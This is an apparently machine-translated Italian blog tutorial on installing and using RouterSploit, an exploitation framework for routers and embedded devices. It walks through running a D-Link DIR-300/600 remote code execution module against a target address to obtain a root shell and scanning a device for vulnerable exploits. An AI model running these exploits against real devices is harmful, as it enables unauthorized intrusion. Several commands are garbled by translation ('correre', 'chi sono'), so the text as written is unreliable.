Casa » Strumenti Linux » RouterSploit – Tutorial completo di Exploitation Framework [2020]

RouterSploit – Tutorial completo di Exploitation Framework [2020]

di friday funkin Il Suyash
routersploit

RouterSploit è un fantastico framework di sfruttamento realizzato appositamente per i dispositivi embedded.

Questo strumento può essere utilizzato da pentester per eseguire la scansione della sicurezza di telecamere e router.

Punti salienti di RouterSploit:

  • Codificato in Python.
  • Interfaccia della riga di comando.
  • Supporto Docker.
  • Strumenti modulari.

Sistema operativo supportato:

  1. Mac OS.
  2. Linux.
  3. Telefono Android.
  4. finestre.

Installazione di RouterSploit:

Requisiti:

  • futuro
  • richieste
  • paramiko
  • pysnmp
  • pycrypto

Opzionale:

  • bluepy – bluetooth a bassa energia

Installazione in Kali Linux:

Segui i comandi seguenti:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Supporto Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazione in Ubuntu:

Segui i comandi seguenti:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Supporto Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazione su MacOS:

Segui i comandi seguenti:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installazione su Docker:

Segui i comandi seguenti:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Come aggiornare RouterSploit?

È necessario aggiornare RouterSploit spesso per evitare inconvenienti.

I nuovi moduli vengono spediti quasi ogni giorno.

cd routersploit
git pull

Come utilizzare RouterSploit?

uso

root @ kalidev:~ / git / routerploit # ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __  `-. _ __ | | ___ _| |_
 |    // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __,_|\__  ___|_|  \____ /| .__ /|_|\___ /|_|\__|
                                     | |
       Framework di sfruttamento per    |_|   di Threat9
            Dispositivi incorporati
  
 Nome in codice   : Sapevo che avresti portato guai
 Versione    : 3.3.0
 Homepage   : https://www.threat9.com/ - @threatnine
 Unisciti a Slack : routerploit.slack.com

 Partecipa al programma beta di Threat9 - https://www.threat9.com/

 Exploit: 128 Scanner: 4 Creds: 165 Generico: 4 Payload: 32 Codificatori: 6

rsf >

Exploit:

Per preformare lo sfruttamento, basta scegliere il modulo e impostare l'obiettivo:

rsf > utilizzare exploit /
exploits / 2wire / exploits / asmax / exploits / asus / exploits / cisco / exploits / dlink / exploits / fortinet / exploits / juniper / exploits / linksys / exploits / multi / exploits / netgear /
rsf > usa exploit / dlink / dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Per il completamento utilizzare il tasto Tab.

Per visualizzare le opzioni, genereshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > mostra le opzioni

Opzioni di destinazione:


   Nome Impostazioni correnti Descrizione                                
   ----       ----------------     -----------                                
   target Indirizzo di destinazione ad es. http://192.168.1.1     
   porta       80                   Porta di destinazione

Usorun oexploit comando per sfruttare il bersaglio:

rsf (D-LINK DIR-300 & DIR-600 RCE) > correre
[+] L'obiettivo è vulnerabile
[*] Richiamo del ciclo di comandi ...
cmd > chi sono
radice

Per impostare le opzioni:

rsf (D-LINK DIR-300 & DIR-600 RCE) > imposta target http://192.168.1.1 [+] {'bersaglio': 'http://192.168.1.1'}

È possibile verificare se il bersaglio è vulnerabile a un particolare exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > dai un'occhiata
[+] L'obiettivo è vulnerabile

Correreshow info per visualizzare informazioni sull'exploit.

Scansione per obiettivi vulnerabili:

Gli scanner consentono di verificare rapidamente se l'obiettivo è vulnerabile a eventuali exploit.

Utilizzare gli stessi comandi per visualizzare / impostare le opzioni, e anche a correre.

rsf (Scanner D-Link) > correre
[+] exploits / dlink / dwr_932_info_disclosure è vulnerabile
[-] exploits / dlink / dir_300_320_615_auth_bypass non è vulnerabile
[-] exploits / dlink / dsl_2750b_info_disclosure non è vulnerabile
[-] exploits / dlink / dns_320l_327l_rce non è vulnerabile
[-] exploits / dlink / dir_645_password_disclosure non è vulnerabile
[-] exploits / dlink / dir_300_600_615_info_disclosure non è vulnerabile
[-] exploits / dlink / dir_300_600_rce non è vulnerabile

[+] Il dispositivo è vulnerabile!
- exploits / dlink / dwr_932_info_disclosure

RouterSploit ufficiale

Leggi anche: 1337x proxy

Parole finali:

RouterSploit è uno strumento straordinario da usare.

In caso di problemi relativi a RouterSploit. Assicurati di commentare in basso. Il nostro team CSHAWK ti contatterà al più presto.

Lascia un commento